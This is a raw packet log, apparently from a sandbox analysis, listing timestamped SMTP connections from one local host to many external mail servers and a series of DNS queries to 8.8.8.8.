Feb 20, 2023 09:52:14.223815918 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.245227098 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.247975111 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.269763947 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.270071030 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.291506052 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.291758060 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.313169956 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.313323975 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.334686995 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.335021973 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.356985092 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.375396013 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.397521973 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.401514053 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.423254013 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.474425077 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.495789051 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.495979071 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.517333031 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.519612074 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.541562080 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.750000954 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.771333933 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.772669077 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.794222116 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.828866959 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.850194931 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.850544930 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.871933937 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.878648043 CET	49786	25	192.168.2.5	131.111.8.146
Feb 20, 2023 09:52:14.914932013 CET	25	49786	131.111.8.146	192.168.2.5
Feb 20, 2023 09:52:14.916657925 CET	49786	25	192.168.2.5	131.111.8.146
Feb 20, 2023 09:52:15.158657074 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.179949045 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.184052944 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.205916882 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.209994078 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.231323004 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.275038958 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.296386003 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.297836065 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.319230080 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.322082996 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.343444109 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.380405903 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.401715994 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.402142048 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.424585104 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.425204992 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.446521044 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.446954012 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.468633890 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.495120049 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.516494036 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.516928911 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.538361073 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.538815022 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.560286045 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.701848984 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.723232985 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.723670959 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.745147943 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.745769978 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.767443895 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.767923117 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.789365053 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.799158096 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.820547104 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.821106911 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:15.843153954 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:15.972801924 CET	49775	25	192.168.2.5	131.107.55.31
Feb 20, 2023 09:52:16.442358017 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.463754892 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.463978052 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.485362053 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.523653984 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.545783997 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.546294928 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.567913055 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.568752050 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.590214968 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.590852022 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.612406969 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.612684011 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.634125948 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.644119978 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.666250944 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.666738033 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.689131021 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.689718962 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.711157084 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.742852926 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.764197111 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.764736891 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.786104918 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.786982059 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.808319092 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.808909893 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.830269098 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.830646038 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.852175951 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.911493063 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.932801008 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:16.933044910 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:16.955389977 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.114425898 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.136610031 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.136851072 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.160541058 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.160929918 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.184386969 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.184941053 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.208657026 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.243772984 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.265232086 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.265465975 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.276232004 CET	49787	25	192.168.2.5	64.29.151.236
Feb 20, 2023 09:52:18.288279057 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.288729906 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.310209036 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.337488890 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.359006882 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.359410048 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.380812883 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.381290913 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.402570009 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.420675039 CET	25	49787	64.29.151.236	192.168.2.5
Feb 20, 2023 09:52:18.421652079 CET	49787	25	192.168.2.5	64.29.151.236
Feb 20, 2023 09:52:18.486203909 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.507797956 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.508276939 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.529673100 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.530235052 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.551724911 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.566281080 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.587865114 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.588237047 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.609648943 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.673947096 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.696990967 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.697400093 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.719285965 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.719806910 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.741147995 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.741616011 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.763055086 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.763741970 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.785254002 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.785896063 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.808507919 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.809083939 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.831379890 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.831943989 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.853262901 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.853717089 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.876141071 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.877003908 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.898298025 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.898641109 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.920934916 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.921324015 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.945873976 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.946599960 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.969500065 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.970326900 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:18.994169950 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:18.994807005 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.018244982 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.018717051 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.042373896 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.042804956 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.065843105 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.066309929 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.089200974 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.089766026 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.111434937 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.134749889 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.156338930 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.156466007 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.178363085 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.250672102 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.272353888 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.272532940 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.293997049 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.294193983 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.315642118 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.315841913 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.337228060 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.337297916 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.351855040 CET	49788	25	192.168.2.5	192.254.190.168
Feb 20, 2023 09:52:19.358742952 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.358834982 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.380350113 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.380479097 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.402089119 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.402124882 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.404314995 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.426052094 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.426336050 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.428811073 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:19.450166941 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:19.521215916 CET	25	49788	192.254.190.168	192.168.2.5
Feb 20, 2023 09:52:19.521351099 CET	49788	25	192.168.2.5	192.254.190.168
Feb 20, 2023 09:52:20.039159060 CET	25	49786	131.111.8.146	192.168.2.5
Feb 20, 2023 09:52:20.176248074 CET	49786	25	192.168.2.5	131.111.8.146
Feb 20, 2023 09:52:20.283499956 CET	49786	25	192.168.2.5	131.111.8.146
Feb 20, 2023 09:52:20.359438896 CET	25	49786	131.111.8.146	192.168.2.5
Feb 20, 2023 09:52:20.645246029 CET	25	49787	64.29.151.236	192.168.2.5
Feb 20, 2023 09:52:20.770077944 CET	49787	25	192.168.2.5	64.29.151.236
Feb 20, 2023 09:52:20.920618057 CET	49787	25	192.168.2.5	64.29.151.236
Feb 20, 2023 09:52:20.973376989 CET	587	49704	208.91.199.225	192.168.2.5
Feb 20, 2023 09:52:20.974391937 CET	587	49704	208.91.199.225	192.168.2.5
Feb 20, 2023 09:52:20.974572897 CET	49704	587	192.168.2.5	208.91.199.225
Feb 20, 2023 09:52:20.976926088 CET	49704	587	192.168.2.5	208.91.199.225
Feb 20, 2023 09:52:21.058675051 CET	49789	25	192.168.2.5	148.163.139.28
Feb 20, 2023 09:52:21.064873934 CET	25	49787	64.29.151.236	192.168.2.5
Feb 20, 2023 09:52:21.107777119 CET	25	49787	64.29.151.236	192.168.2.5
Feb 20, 2023 09:52:21.115966082 CET	49787	25	192.168.2.5	64.29.151.236
Feb 20, 2023 09:52:21.177057981 CET	25	49789	148.163.139.28	192.168.2.5
Feb 20, 2023 09:52:21.179743052 CET	49789	25	192.168.2.5	148.163.139.28
Feb 20, 2023 09:52:21.260062933 CET	25	49787	64.29.151.236	192.168.2.5
Feb 20, 2023 09:52:21.268127918 CET	25	49787	64.29.151.236	192.168.2.5
Feb 20, 2023 09:52:21.372096062 CET	49787	25	192.168.2.5	64.29.151.236
Feb 20, 2023 09:52:21.393188953 CET	25	49789	148.163.139.28	192.168.2.5
Feb 20, 2023 09:52:21.471868992 CET	49789	25	192.168.2.5	148.163.139.28
Feb 20, 2023 09:52:21.827672005 CET	49789	25	192.168.2.5	148.163.139.28
Feb 20, 2023 09:52:21.828949928 CET	49787	25	192.168.2.5	64.29.151.236
Feb 20, 2023 09:52:21.945971966 CET	25	49789	148.163.139.28	192.168.2.5
Feb 20, 2023 09:52:21.946043968 CET	25	49789	148.163.139.28	192.168.2.5
Feb 20, 2023 09:52:21.946161985 CET	49789	25	192.168.2.5	148.163.139.28
Feb 20, 2023 09:52:21.946161985 CET	49789	25	192.168.2.5	148.163.139.28
Feb 20, 2023 09:52:21.972832918 CET	25	49787	64.29.151.236	192.168.2.5
Feb 20, 2023 09:52:21.972984076 CET	25	49787	64.29.151.236	192.168.2.5
Feb 20, 2023 09:52:21.973320007 CET	49787	25	192.168.2.5	64.29.151.236
Feb 20, 2023 09:52:23.691788912 CET	49790	25	192.168.2.5	140.78.3.83
Feb 20, 2023 09:52:23.715971947 CET	25	49790	140.78.3.83	192.168.2.5
Feb 20, 2023 09:52:23.716825008 CET	49790	25	192.168.2.5	140.78.3.83
Feb 20, 2023 09:52:23.740928888 CET	25	49790	140.78.3.83	192.168.2.5
Feb 20, 2023 09:52:24.277612925 CET	49791	25	192.168.2.5	153.127.71.68
Feb 20, 2023 09:52:24.567241907 CET	25	49791	153.127.71.68	192.168.2.5
Feb 20, 2023 09:52:24.567455053 CET	49791	25	192.168.2.5	153.127.71.68
Feb 20, 2023 09:52:24.898000002 CET	25	49788	192.254.190.168	192.168.2.5
Feb 20, 2023 09:52:24.984507084 CET	49788	25	192.168.2.5	192.254.190.168
Feb 20, 2023 09:52:25.047172070 CET	25	49791	153.127.71.68	192.168.2.5
Feb 20, 2023 09:52:25.052886009 CET	49791	25	192.168.2.5	153.127.71.68
Feb 20, 2023 09:52:25.061578989 CET	49788	25	192.168.2.5	192.254.190.168
Feb 20, 2023 09:52:25.231187105 CET	25	49788	192.254.190.168	192.168.2.5
Feb 20, 2023 09:52:25.263453007 CET	25	49790	140.78.3.83	192.168.2.5
Feb 20, 2023 09:52:25.326761961 CET	25	49786	131.111.8.146	192.168.2.5
Feb 20, 2023 09:52:25.342432022 CET	25	49791	153.127.71.68	192.168.2.5
Feb 20, 2023 09:52:25.342478037 CET	25	49791	153.127.71.68	192.168.2.5
Feb 20, 2023 09:52:25.362339973 CET	49790	25	192.168.2.5	140.78.3.83
Feb 20, 2023 09:52:25.380265951 CET	49788	25	192.168.2.5	192.254.190.168
Feb 20, 2023 09:52:25.380383015 CET	49786	25	192.168.2.5	131.111.8.146
Feb 20, 2023 09:52:25.461666107 CET	49791	25	192.168.2.5	153.127.71.68
Feb 20, 2023 09:52:25.545869112 CET	49790	25	192.168.2.5	140.78.3.83
Feb 20, 2023 09:52:25.564479113 CET	49786	25	192.168.2.5	131.111.8.146
Feb 20, 2023 09:52:25.566091061 CET	49788	25	192.168.2.5	192.254.190.168
Feb 20, 2023 09:52:25.566356897 CET	49791	25	192.168.2.5	153.127.71.68
Feb 20, 2023 09:52:25.570970058 CET	25	49790	140.78.3.83	192.168.2.5
Feb 20, 2023 09:52:25.571037054 CET	25	49790	140.78.3.83	192.168.2.5
Feb 20, 2023 09:52:25.588017941 CET	49790	25	192.168.2.5	140.78.3.83
Feb 20, 2023 09:52:25.600761890 CET	25	49786	131.111.8.146	192.168.2.5
Feb 20, 2023 09:52:25.611939907 CET	25	49790	140.78.3.83	192.168.2.5
Feb 20, 2023 09:52:25.612061024 CET	25	49790	140.78.3.83	192.168.2.5
Feb 20, 2023 09:52:25.634705067 CET	49790	25	192.168.2.5	140.78.3.83
Feb 20, 2023 09:52:25.658552885 CET	25	49790	140.78.3.83	192.168.2.5
Feb 20, 2023 09:52:25.658584118 CET	25	49790	140.78.3.83	192.168.2.5
Feb 20, 2023 09:52:25.658657074 CET	49790	25	192.168.2.5	140.78.3.83
Feb 20, 2023 09:52:25.735553026 CET	25	49788	192.254.190.168	192.168.2.5
Feb 20, 2023 09:52:25.857584953 CET	25	49791	153.127.71.68	192.168.2.5
Feb 20, 2023 09:52:25.883610964 CET	49788	25	192.168.2.5	192.254.190.168
Feb 20, 2023 09:52:25.947779894 CET	49788	25	192.168.2.5	192.254.190.168
Feb 20, 2023 09:52:25.948069096 CET	49791	25	192.168.2.5	153.127.71.68
Feb 20, 2023 09:52:26.157932997 CET	25	49788	192.254.190.168	192.168.2.5
Feb 20, 2023 09:52:26.239079952 CET	25	49791	153.127.71.68	192.168.2.5
Feb 20, 2023 09:52:26.348474979 CET	49791	25	192.168.2.5	153.127.71.68
Feb 20, 2023 09:52:26.638439894 CET	25	49791	153.127.71.68	192.168.2.5
Feb 20, 2023 09:52:26.638528109 CET	49791	25	192.168.2.5	153.127.71.68
Feb 20, 2023 09:52:28.531287909 CET	49793	25	192.168.2.5	96.47.154.206
Feb 20, 2023 09:52:28.761245966 CET	49794	25	192.168.2.5	131.107.55.31
Feb 20, 2023 09:52:30.604484081 CET	25	49786	131.111.8.146	192.168.2.5
Feb 20, 2023 09:52:30.659274101 CET	49786	25	192.168.2.5	131.111.8.146
Feb 20, 2023 09:52:31.214059114 CET	25	49788	192.254.190.168	192.168.2.5
Feb 20, 2023 09:52:31.261112928 CET	49788	25	192.168.2.5	192.254.190.168
Feb 20, 2023 09:52:31.540101051 CET	49793	25	192.168.2.5	96.47.154.206
Feb 20, 2023 09:52:31.765522003 CET	49794	25	192.168.2.5	131.107.55.31

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 20, 2023 09:50:33.691226006 CET	61894	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:33.708488941 CET	53	61894	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:33.742201090 CET	60649	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:33.759432077 CET	53	60649	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:35.136528015 CET	60650	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:35.165070057 CET	53	60650	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:35.170485973 CET	51441	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:35.199630976 CET	53	51441	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:35.247699976 CET	51442	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:35.420696974 CET	53	51442	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:35.424556017 CET	49177	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:35.454116106 CET	53	49177	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:36.190485001 CET	49178	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:36.213716030 CET	53	49178	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:36.216934919 CET	49724	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:36.242996931 CET	53	49724	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:36.615365028 CET	49725	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:36.737242937 CET	53	49725	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:36.748478889 CET	61452	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:36.774624109 CET	53	61452	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:36.861618042 CET	61453	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:36.965387106 CET	53	61453	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:36.973222971 CET	65323	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:37.102286100 CET	53	65323	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:41.714241028 CET	65324	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:41.733701944 CET	53	65324	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:41.898246050 CET	51484	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:42.005897999 CET	53	51484	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:42.334381104 CET	51485	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:42.365084887 CET	53	51485	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:42.376518011 CET	63446	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:42.402328014 CET	53	63446	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:42.733082056 CET	63447	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:42.750166893 CET	53	63447	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:42.762234926 CET	56751	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:42.788300037 CET	53	56751	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:43.041174889 CET	56752	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:43.060803890 CET	53	56752	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:43.085211039 CET	55039	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:43.103163004 CET	53	55039	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:43.667500019 CET	55040	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:43.684453011 CET	53	55040	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:43.692118883 CET	60975	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:43.720084906 CET	53	60975	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:44.627583027 CET	60976	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:44.644552946 CET	53	60976	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:44.689867973 CET	59220	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:44.706617117 CET	53	59220	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:48.446297884 CET	59221	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:50.898061991 CET	53	59221	8.8.8.8	192.168.2.5
Feb 20, 2023 09:50:51.205521107 CET	59222	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:50:54.795989990 CET	53	59222	8.8.8.8	192.168.2.5
